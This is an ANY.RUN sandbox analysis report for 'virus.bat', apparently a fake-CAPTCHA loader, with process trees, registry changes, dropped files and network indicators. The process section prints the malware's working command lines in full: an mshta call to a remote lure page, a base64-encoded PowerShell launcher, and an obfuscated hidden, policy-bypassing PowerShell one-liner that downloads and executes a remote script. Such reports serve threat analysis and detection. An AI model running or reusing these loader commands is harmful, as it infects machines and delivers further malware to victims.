File name:

virus.bat

Full analysis: https://app.any.run/tasks/a99b535a-5ebd-4072-b5ba-2eb7493eca90
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: January 12, 2025, 18:18:27
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
reflection
loader
Indicators:
MIME: text/plain
File info: Unicode text, UTF-8 text, with no line terminators
MD5:

CED876CFB590963F224E93855679D5AC

SHA1:

B000D4D4D8571DAB741D2013189FECCB646BC66D

SHA256:

9E8A67140719995207A3242966B16EC02CCF5B54F4D4E34E1FB86DE87D8DBDF1

SSDEEP:

3:rN6e/IVKX3K8jAPahsTDiAZzwe5t+RbqRF4I1yMQRWLTB:Z6ewM3xAih8muzwjIMPyt

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 3808)
      • powershell.exe (PID: 1488)

    • Changes powershell execution policy (Bypass)

      • powershell.exe (PID: 3808)

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 1488)

    • Script downloads file (POWERSHELL)

      • powershell.exe (PID: 1488)

    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 1488)

  • SUSPICIOUS

    • Executes script without checking the security policy

      • powershell.exe (PID: 1488)

    • Base64-obfuscated command line is found

      • mshta.exe (PID: 2164)

    • BASE64 encoded PowerShell command has been detected

      • mshta.exe (PID: 2164)

    • Starts POWERSHELL.EXE for commands execution

      • powershell.exe (PID: 3808)
      • mshta.exe (PID: 2164)

    • The process bypasses the loading of PowerShell profile settings

      • powershell.exe (PID: 3808)

    • Detects reflection assembly loader (YARA)

      • powershell.exe (PID: 1488)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 1488)

  • INFO

    • The process uses the downloaded file

      • mshta.exe (PID: 2164)
      • powershell.exe (PID: 3808)

    • Reads Internet Explorer settings

      • mshta.exe (PID: 2164)

    • Checks proxy server information

      • mshta.exe (PID: 2164)
      • powershell.exe (PID: 1488)

    • Creates or changes the value of an item property via Powershell

      • powershell.exe (PID: 3808)

    • Disables trace logs

      • powershell.exe (PID: 1488)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 1488)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
123
Monitored processes
7
Malicious processes
3
Suspicious processes
1

Behavior graph

Click at the process to see the details
start cmd.exe no specs conhost.exe no specs mshta.exe powershell.exe no specs conhost.exe no specs powershell.exe conhost.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1488"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command gdr -*;Set-Variable CiU (.$ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name)|Member|Where-Object{$_.Name-like'*t*om*d'}).Name).Invoke($ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name).PsObject.Methods|Where-Object{$_.Name-like'*om*e'}).Name).Invoke('N*-O*',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);Set-Item Variable:/lW 'https://d1.exploredairyaptitude.shop/sh.bin';[ScriptBlock]::Create((GI Variable:CiU).Value.((((GI Variable:CiU).Value|Member)|Where-Object{$_.Name-like'*nl*g'}).Name).Invoke((Variable lW).Value)).InvokeReturnAsIs() C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
2164mshta https://solve.porw.org/awjsx.captcha?u=ff0c0b18-0056-47b0-9efd-2a9e88ea7e43 # ✅ ''I am not a robot - reCAPTCHA Verification ID: 1483''C:\Windows\System32\mshta.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
11.00.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\wldp.dll
3220\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3560C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\Desktop\virus.bat" "C:\Windows\System32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
3808"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -Enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAJwAtAHcAJwAsACcAaABpAGQAZABlAG4AJwAsACcALQBlAHAAJwAsACcAYgB5AHAAYQBzAHMAJwAsACcALQBuAG8AcAAnACwAJwAtAEMAbwBtAG0AYQBuAGQAJwAsACcAZwBkAHIAIAAtACoAOwBTAGUAdAAtAFYAYQByAGkAYQBiAGwAZQAgAEMAaQBVACAAKAAuACQARQB4AGUAYwB1AHQAaQBvAG4AQwBvAG4AdABlAHgAdAAuACgAKAAkAEUAeABlAGMAdQB0AGkAbwBuAEMAbwBuAHQAZQB4AHQAfABNAGUAbQBiAGUAcgApAFsANgBdAC4ATgBhAG0AZQApAC4AKAAoACQARQB4AGUAYwB1AHQAaQBvAG4AQwBvAG4AdABlAHgAdAAuACgAKAAkAEUAeABlAGMAdQB0AGkAbwBuAEMAbwBuAHQAZQB4AHQAfABNAGUAbQBiAGUAcgApAFsANgBdAC4ATgBhAG0AZQApAHwATQBlAG0AYgBlAHIAfABXAGgAZQByAGUALQBPAGIAagBlAGMAdAB7ACQAXwAuAE4AYQBtAGUALQBsAGkAawBlACcAJwAqAHQAKgBvAG0AKgBkACcAJwB9ACkALgBOAGEAbQBlACkALgBJAG4AdgBvAGsAZQAoACQARQB4AGUAYwB1AHQAaQBvAG4AQwBvAG4AdABlAHgAdAAuACgAKAAkAEUAeABlAGMAdQB0AGkAbwBuAEMAbwBuAHQAZQB4AHQAfABNAGUAbQBiAGUAcgApAFsANgBdAC4ATgBhAG0AZQApAC4AKAAoACQARQB4AGUAYwB1AHQAaQBvAG4AQwBvAG4AdABlAHgAdAAuACgAKAAkAEUAeABlAGMAdQB0AGkAbwBuAEMAbwBuAHQAZQB4AHQAfABNAGUAbQBiAGUAcgApAFsANgBdAC4ATgBhAG0AZQApAC4AUABzAE8AYgBqAGUAYwB0AC4ATQBlAHQAaABvAGQAcwB8AFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0AHsAJABfAC4ATgBhAG0AZQAtAGwAaQBrAGUAJwAnACoAbwBtACoAZQAnACcAfQApAC4ATgBhAG0AZQApAC4ASQBuAHYAbwBrAGUAKAAnACcATgAqAC0ATwAqACcAJwAsACQAVABSAFUARQAsACQAVABSAFUARQApACwAWwBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEMAbwBtAG0AYQBuAGQAVAB5AHAAZQBzAF0AOgA6AEMAbQBkAGwAZQB0ACkATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApADsAUwBlAHQALQBJAHQAZQBtACAAVgBhAHIAaQBhAGIAbABlADoALwBsAFcAIAAnACcAaAB0AHQAcABzADoALwAvAGQAMQAuAGUAeABwAGwAbwByAGUAZABhAGkAcgB5AGEAcAB0AGkAdAB1AGQAZQAuAHMAaABvAHAALwBzAGgALgBiAGkAbgAnACcAOwBbAFMAYwByAGkAcAB0AEIAbABvAGMAawBdADoAOgBDAHIAZQBhAHQAZQAoACgARwBJACAAVgBhAHIAaQBhAGIAbABlADoAQwBpAFUAKQAuAFYAYQBsAHUAZQAuACgAKAAoACgARwBJACAAVgBhAHIAaQBhAGIAbABlADoAQwBpAFUAKQAuAFYAYQBsAHUAZQB8AE0AZQBtAGIAZQByACkAfABXAGgAZQByAGUALQBPAGIAagBlAGMAdAB7ACQAXwAuAE4AYQBtAGUALQBsAGkAawBlACcAJwAqAG4AbAAqAGcAJwAnAH0AKQAuAE4AYQBtAGUAKQAuAEkAbgB2AG8AawBlACgAKABWAGEAcgBpAGEAYgBsAGUAIABsAFcAKQAuAFYAYQBsAHUAZQApACkALgBJAG4AdgBvAGsAZQBSAGUAdAB1AHIAbgBBAHMASQBzACgAKQAnAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4300\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5472\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
13 519
Read events
13 502
Write events
17
Delete events
0

Modification events

(PID) Process:(2164) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(2164) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(2164) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(1488) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(1488) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(1488) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(1488) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileTracingMask
Value:
(PID) Process:(1488) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
(PID) Process:(1488) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(1488) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileDirectory
Value:
%windir%\tracing
Executable files
0
Suspicious files
3
Text files
4
Unknown types
0

Dropped files

PID
Process
Filename
Type
1488powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_32ecejvr.tte.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1488powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ghwbruki.eqa.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
3808powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_mexnf3nf.eii.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
2164mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\RR3E01RZ\sh_ykxto[1].mp4binary
MD5:EC0668B7D6CF8C11ACF13767E28803F1
SHA256:F59ABFA2C0D02EA31B01E0D079217B4F1ED10F4E0929AF7A0286A9D72074438A
3808powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_z3qbfyrf.xk1.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
3808powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:39FE545802DAE4D8D6812C42A12EF064
SHA256:190F5E9CA5F4778A6CD2603EFAA31481F4A9D4696FB721FF1BC3C292A1067E75
1488powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCachebinary
MD5:03B2BFD0E9FA09284B7B6BE80AB70FD7
SHA256:92D1F3A86A8E17CEC98840CA2D291E2E073147448E6C459792FA68F0944ABF9D
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
7
TCP/UDP connections
23
DNS requests
8
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
302
104.21.16.1:443
https://solve.porw.org/awjsx.captcha?u=ff0c0b18-0056-47b0-9efd-2a9e88ea7e43
unknown
2040
svchost.exe
GET
200
23.48.23.182:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
4712
MoUsoCoreWorker.exe
GET
200
23.48.23.182:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
4712
MoUsoCoreWorker.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
2040
svchost.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
GET
200
104.26.14.134:443
https://b1.exploredairyaptitude.shop/sh_ykxto.mp4
unknown
binary
512 Kb
GET
200
172.67.70.185:443
https://d1.exploredairyaptitude.shop/sh.bin
unknown
text
9.27 Mb
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2040
svchost.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4
System
192.168.100.255:137
whitelisted
4712
MoUsoCoreWorker.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4
System
192.168.100.255:138
whitelisted
2164
mshta.exe
104.21.32.1:443
solve.porw.org
CLOUDFLARENET
unknown
2040
svchost.exe
23.48.23.182:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
2164
mshta.exe
172.67.70.185:443
b1.exploredairyaptitude.shop
CLOUDFLARENET
US
unknown
4712
MoUsoCoreWorker.exe
23.48.23.182:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
4712
MoUsoCoreWorker.exe
23.35.229.160:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 20.73.194.208
whitelisted
google.com
  • 142.250.185.206
whitelisted
solve.porw.org
  • 104.21.32.1
  • 104.21.96.1
  • 104.21.112.1
  • 104.21.48.1
  • 104.21.80.1
  • 104.21.64.1
  • 104.21.16.1
unknown
crl.microsoft.com
  • 23.48.23.182
  • 23.48.23.162
  • 23.48.23.168
  • 23.48.23.173
  • 23.48.23.170
  • 23.48.23.154
  • 23.48.23.171
  • 23.48.23.177
  • 23.48.23.163
whitelisted
b1.exploredairyaptitude.shop
  • 172.67.70.185
  • 104.26.15.134
  • 104.26.14.134
unknown
www.microsoft.com
  • 23.35.229.160
whitelisted
d1.exploredairyaptitude.shop
  • 104.26.14.134
  • 104.26.15.134
  • 172.67.70.185
unknown
self.events.data.microsoft.com
  • 20.189.173.9
whitelisted

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
virus.bat